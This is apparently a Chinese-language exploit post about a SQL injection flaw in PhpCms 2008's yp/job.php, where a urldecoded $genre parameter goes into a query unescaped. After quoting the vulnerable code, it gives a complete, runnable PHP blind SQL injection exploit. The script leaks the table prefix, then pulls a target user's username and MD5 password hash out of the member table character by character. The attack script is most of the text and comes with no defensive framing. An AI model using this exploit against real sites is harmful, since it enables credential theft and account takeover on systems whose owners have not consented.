久久久电脑

漏洞存在于yp/job.php的17-34行，urldecode函数惹的祸，代码如下：

==========================================================
switch($action)
{
case 'list':
$catid = intval($catid);
$head['keywords'] .= '职位列表';
$head['title'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$head['description'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$templateid = 'job_list';
if($inputtime)
$time = time() - 3600*$inputtime*24;
else $time = 0;
if($time < 0 )$time = 0;
$where = "j.updatetime >= '{$time}' ";
$genre = urldecode($genre);
if($station)$where .= "AND j.station = '{$station}' ";
if($genre)$where .= "AND c.genre = '{$genre}' ";
if(!trim($where))$where = '1';
break;

=================================================================

exp：

<?

if ($argc != 4)
usage ();

$hostname = $argv [1];
$path = $argv [2];
$userid = $argv [3];
$prefix="phpcms_";
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$pos = 1;
$chr = 0;


function usage ()
{
global $argv;
echo
"\n[+] PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit".
"\n[+] Author: My5t3ry".
"\n[+] Site  : http://hi.baidu.com/netstart".
"\n[+] Usage : php ".$argv[0]." <hostname> <path> <userid>".
"\n[+] Ex.   : php ".$argv[0]." localhost /yp 1".
"\n\n";
exit ();
}

function request ($hostname, $path, $query)
{
$fp = fsockopen ($hostname, 80);

$request = "GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";

fputs ($fp, $request);

while (!feof ($fp))
$reply .= fgets ($fp, 1024);

fclose ($fp);
return $reply;
}

function exploit ($hostname, $path, $uid, $fld, $chr, $pos)
{
global $prefix;

$chr = ord ($chr);

$query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%2527", $query);

$outcode = request ($hostname, $path, $query);

preg_match ("/<span class=\"c_orange\">(.+)<\/span>/", $outcode, $x);

if (strlen (trim ($x [1])) == 0)
return false;
else
return true;
}

$query = "x%2527";

$outcode = request ($hostname, $path, $query);

preg_match('/FROM `(.+)yp_job/ie',$outcode,$match);

$prefix=$match[1];

//function lengthcolumns ()
//{
echo "\n--------------------------------------------------------------------------------\n";
echo " PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n--------------------------------------------------------------------------------\n";
echo "[~]trying to get pre...\n";

if ($match[1]) {

echo '[+]Good Job!Wo Got The pre -> '.$match[1]."\n";
}

else {
die(" Exploit failed...");
}

echo "[~]trying to get username length...\n";
$exit=0;
$length=0;
$i=0;
while ($exit==0)
{
$query = "x' OR length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." OR '1'='2";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%2527", $query);

$outcode = request ($hostname, $path, $query);

$i++;

preg_match ("/<span class=\"c_orange\">(.+)<\/span>/", $outcode, $x);
//echo $outcode;
if ($i>20) {die(" Exploit failed...");}  

if (strlen (trim ($x [1])) != 0) {
$exit=1;
}else{
$exit=0;
}
}

$length=$i-1;
echo "[+]length -> ".$length;

//    return $length;
//}

echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";

while ($pos <= $length)
{
$key = "abcdefghijklmnopqrstuvwxyz0123456789";

if (exploit ($hostname, $path, $userid, "username", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

$pos = 9;

echo "\n[+]password(md5) -> ";

while ($pos <= 24)
{
$key = "abcdef0123456789";
if (exploit ($hostname, $path, $userid, "password", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

echo "\n[+]Done!";
echo "\n\n--------------------------------------------------------------------------------";

?>